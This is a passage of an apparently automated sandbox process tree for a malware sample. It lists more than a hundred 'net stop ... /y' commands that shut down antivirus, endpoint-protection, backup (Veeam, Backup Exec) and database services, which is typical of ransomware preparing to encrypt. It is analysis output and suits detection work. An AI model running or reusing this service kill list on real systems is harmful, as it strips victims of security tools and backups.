      "net.exe" stop MSSQL$SBSMONITORING /
      4⤵
      PID:5588
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
        5⤵
        
        PID:14852
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$SBSMONITORING /y
      4⤵
      PID:5596
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
        5⤵
        
        PID:3272
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop AVP /y
      4⤵
      PID:5604
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop AVP /y
        5⤵
        
        PID:16168
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      4⤵
      PID:5612
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        5⤵
        
        PID:15436
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$SHAREPOINT /y
      4⤵
      PID:5620
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
        5⤵
        
        PID:4144
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop DCAgent /y
      4⤵
      PID:5628
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop DCAgent /y
        5⤵
        
        PID:5004
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop bedbg /y
      4⤵
      PID:5636
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop bedbg /y
        5⤵
        
        PID:16440
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$SQL_2008 /y
      4⤵
      PID:5644
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
        5⤵
        
        PID:10840
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop EhttpSrv /y
      4⤵
      PID:5652
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EhttpSrv /y
        5⤵
        
        PID:13928
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MMS /y
      4⤵
      PID:5660
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MMS /y
        5⤵
        
        PID:444
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:5668
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
        5⤵
        
        PID:10336
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ekrn /y
      4⤵
      PID:5676
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ekrn /y
        5⤵
        
        PID:13960
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop mozyprobackup /y
      4⤵
      PID:5684
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mozyprobackup /y
        5⤵
        
        PID:15996
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:5692
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
        5⤵
        
        PID:14512
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop EPSecurityService /y
      4⤵
      PID:5700
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EPSecurityService /y
        5⤵
        
        PID:15988
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:5708
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        5⤵
        
        PID:15872
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$TPS /y
      4⤵
      PID:5716
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$TPS /y
        5⤵
        
        PID:15980
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop EPUpdateService /y
      4⤵
      PID:5724
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EPUpdateService /y
        5⤵
        
        PID:16656
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ntrtscan /y
      4⤵
      PID:5732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ntrtscan /y
        5⤵
        
        PID:16260
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$TPSAMA /y
      4⤵
      PID:5740
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
        5⤵
        
        PID:14932
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop EsgShKernel /y
      4⤵
      PID:5748
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop EsgShKernel /y
        5⤵
        
        PID:14444
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop PDVFSService /y
      4⤵
      PID:5756
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop PDVFSService /y
        5⤵
        
        PID:15964
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:5764
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
        5⤵
        
        PID:14876
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ESHASRV /y
      4⤵
      PID:5772
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ESHASRV /y
        5⤵
        
        PID:4700
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SDRSVC /y
      4⤵
      PID:5780
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SDRSVC /y
        5⤵
        
        PID:14488
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:5788
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
        5⤵
        
        PID:13604
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop FA_Scheduler /y
      4⤵
      PID:5796
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop FA_Scheduler /y
        5⤵
        
        PID:15848
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:5804
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        5⤵
        
        PID:16464
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:5812
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
        5⤵
        
        PID:15300
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop KAVFS /y
      4⤵
      PID:5820
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KAVFS /y
        5⤵
        
        PID:14472
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLWriter /y
      4⤵
      PID:5828
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter /y
        5⤵
        
        PID:15524
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:5836
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
        5⤵
        
        PID:16184
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop KAVFSGT /y
      4⤵
      PID:5844
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop KAVFSGT /y
        5⤵
        
        PID:15864
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamBackupSvc /y
      4⤵
      PID:5852
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBackupSvc /y
        5⤵
        
        PID:16352
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:5860
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
        5⤵
        
        PID:16396
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop kavfsslp /y
      4⤵
      PID:5868
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop kavfsslp /y
        5⤵
        
        PID:13980
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamBrokerSvc /y
      4⤵
      PID:5876
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamBrokerSvc /y
        5⤵
        
        PID:15840
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:5884
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
        5⤵
        
        PID:15276
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop klnagent /y
      4⤵
      PID:5892
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop klnagent /y
        5⤵
        
        PID:16304
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamCatalogSvc /y
      4⤵
      PID:5900
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCatalogSvc /y
        5⤵
        
        PID:14940
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:5908
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
        5⤵
        
        PID:14440
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop macmnsvc /y
      4⤵
      PID:5916
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop macmnsvc /y
        5⤵
        
        PID:16284
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamCloudSvc /y
      4⤵
      PID:5924
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamCloudSvc /y
        5⤵
        
        PID:15812
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:5932
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
        5⤵
        
        PID:15896
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop masvc /y
      4⤵
      PID:5940
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop masvc /y
        5⤵
        
        PID:15788
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamDeploymentService /y
      4⤵
      PID:5948
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        5⤵
        
        PID:15420
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:5956
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
        5⤵
        
        PID:15460
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MBAMService /y
      4⤵
      PID:5964
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MBAMService /y
        5⤵
        
        PID:16028
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamDeploySvc /y
      4⤵
      PID:5972
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamDeploySvc /y
        5⤵
        
        PID:16328
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLSERVER /y
      4⤵
      PID:5980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLSERVER /y
        5⤵
        
        PID:13972
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MBEndpointAgent /y
      4⤵
      PID:5988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MBEndpointAgent /y
        5⤵
        
        PID:16404
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:5996
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
        5⤵
        
        PID:15148
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLServerADHelper /y
      4⤵
      PID:6004
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper /y
        5⤵
        
        PID:16360
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop McAfeeEngineService /y
      4⤵
      PID:6012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McAfeeEngineService /y
        5⤵
        
        PID:16432
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamHvIntegrationSvc /y
      4⤵
      PID:6020
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
        5⤵
        
        PID:15556
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLServerADHelper100 /y
      4⤵
      PID:6028
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
        5⤵
        
        PID:15548
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop McAfeeFramework /y
      4⤵
      PID:6036
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McAfeeFramework /y
        5⤵
        
        PID:15468
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamMountSvc /y
      4⤵
      PID:6044
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamMountSvc /y
        5⤵
        
        PID:756
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQLServerOLAPService /y
      4⤵
      PID:6052
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
        5⤵
        
        PID:16808
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:6060
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
        5⤵
        
        PID:15476
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamNFSSvc /y
      4⤵
      PID:6068
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        5⤵
        
        PID:14504
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MySQL57 /y
      4⤵
      PID:6076
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL57 /y
        5⤵
        
        PID:16176
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop McShield /y
      4⤵
      PID:6084
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McShield /y
        5⤵
        
        PID:16244
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamRESTSvc /y
      4⤵
      PID:6092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamRESTSvc /y
        5⤵
        
        PID:15948
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MySQL80 /y
      4⤵
      PID:6100
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MySQL80 /y
        5⤵
        
        PID:15684
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop McTaskManager /y
      4⤵
      PID:6108
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop McTaskManager /y
        5⤵
        
        PID:16252
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamTransportSvc /y
      4⤵
      PID:6116
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        5⤵
        
        PID:15888
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop OracleClientCache80 /y
      4⤵
      PID:6124
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop OracleClientCache80 /y
        5⤵
        
        PID:16312
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop mfefire /y
      4⤵
      PID:6132
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mfefire /y
        5⤵
        
        PID:15692
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop wbengine /y
      4⤵
      PID:6140
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wbengine /y
        5⤵
        
        PID:16732
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ReportServer$SQL_2008 /y
      4⤵
      PID:6148
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
        5⤵
        
        PID:16872
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop mfemms /y
      4⤵
      PID:6156
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mfemms /y
        5⤵
        
        PID:16480
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop wbengine /y
      4⤵
      PID:6164
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop wbengine /y
        5⤵
        
        PID:16472
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop RESvc /y
      4⤵
      PID:6172
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop RESvc /y
        5⤵
        
        PID:16144
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop mfevtp /y
      4⤵
      PID:6180
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop mfevtp /y
        5⤵
        
        PID:16152
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop sms_site_sql_backup /y
      4⤵
      PID:6188
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop sms_site_sql_backup /y
        5⤵
        
        PID:16724
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:6196
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
        5⤵
        
        PID:16648
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop MSSQL$SOPHOS /y
      4⤵
      PID:6204
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
        5⤵
        
        PID:15340
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:6212
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
        5⤵
        
        PID:15292
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop sacsvr /y
      4⤵
      PID:6220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop sacsvr /y
        5⤵
        
        PID:14416
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$CXDB /y
      4⤵
      PID:6228
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$CXDB /y
        5⤵
        
        PID:15132
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SAVAdminService /y
      4⤵
      PID:6236
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAVAdminService /y
        5⤵
        
        PID:15640
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$ECWDB2 /y
      4⤵
      PID:6244
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
        5⤵
        
        PID:14456
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SAVService /y
      4⤵
      PID:6252
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SAVService /y
        5⤵
        
        PID:14916
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:6260
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
        5⤵
        
        PID:16296
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SepMasterService /y
      4⤵
      PID:6268
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SepMasterService /y
        5⤵
        
        PID:14800
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:6276
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
        5⤵
        
        PID:13920
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop ShMonitor /y
      4⤵
      PID:6284
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop ShMonitor /y
        5⤵
        
        PID:10168
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$PROD /y
      4⤵
      PID:6292
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PROD /y
        5⤵
        
        PID:14784
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop Smcinst /y
      4⤵
      PID:6300
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop Smcinst /y
        5⤵
        
        PID:15348
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:6308
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
        5⤵
        
        PID:16692
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SmcService /y
      4⤵
      PID:6316
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SmcService /y
        5⤵
        
        PID:15324
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:6324
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
        5⤵
        
        PID:15388
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SntpService /y
      4⤵
      PID:6332
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SntpService /y
        5⤵
        
        PID:15396
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:6340
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
        5⤵
        
        PID:15372
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop sophossps /y
      4⤵
      PID:6348
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop sophossps /y
        5⤵
        
        PID:14424
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$SQL_2008 /y
      4⤵
      PID:6356
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
        5⤵
        
        PID:6824
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$SOPHOS /y
      4⤵
      PID:6364
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
        5⤵
        
        PID:15492
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:6372
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
        5⤵
        
        PID:14740
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop svcGenericHost /y
      4⤵
      PID:6380
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop svcGenericHost /y
        5⤵
        
        PID:15380
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:6388
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
        5⤵
        
        PID:14768
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop swi_filter /y
      4⤵
      PID:6396
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_filter /y
        5⤵
        
        PID:15124
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$TPS /y
      4⤵
      PID:6404
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$TPS /y
        5⤵
        
        PID:14900
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop swi_service /y
      4⤵
      PID:6416
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_service /y
        5⤵
        
        PID:14924
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$TPSAMA /y
      4⤵
      PID:6424
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
        5⤵
        
        PID:16488
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop swi_update /y
      4⤵
      PID:6432
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_update /y
        5⤵
        
        PID:15804
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:6440
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
        5⤵
        
        PID:15012
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop swi_update_64 /y
      4⤵
      PID:6452
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop swi_update_64 /y
        5⤵
        
        PID:15796
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:6460
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
        5⤵
        
        PID:14956
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop TmCCSF /y
      4⤵
      PID:6472
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TmCCSF /y
        5⤵
        
        PID:15428
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLBrowser /y
      4⤵
      PID:6484
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser /y
        5⤵
        
        PID:15412
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop tmlisten /y
      4⤵
      PID:6492
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop tmlisten /y
        5⤵
        
        PID:14760
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLSafeOLRService /y
      4⤵
      PID:6504
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLSafeOLRService /y
        5⤵
        
        PID:16320
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop TrueKey /y
      4⤵
      PID:6512
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TrueKey /y
        5⤵
        
        PID:15364
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLSERVERAGENT /y
      4⤵
      PID:6520
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLSERVERAGENT /y
        5⤵
        
        PID:15676
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop TrueKeyScheduler /y
      4⤵
      PID:6528
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TrueKeyScheduler /y
        5⤵
        
        PID:15956
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLTELEMETRY /y
      4⤵
      PID:6536
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLTELEMETRY /y
        5⤵
        
        PID:16412
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop TrueKeyServiceHelper /y
      4⤵
      PID:6552
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
        5⤵
        
        PID:16368
  - - C:\Windows\SysWOW64\net.exe
      "net.exe" stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:6560
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
        5⤵
        
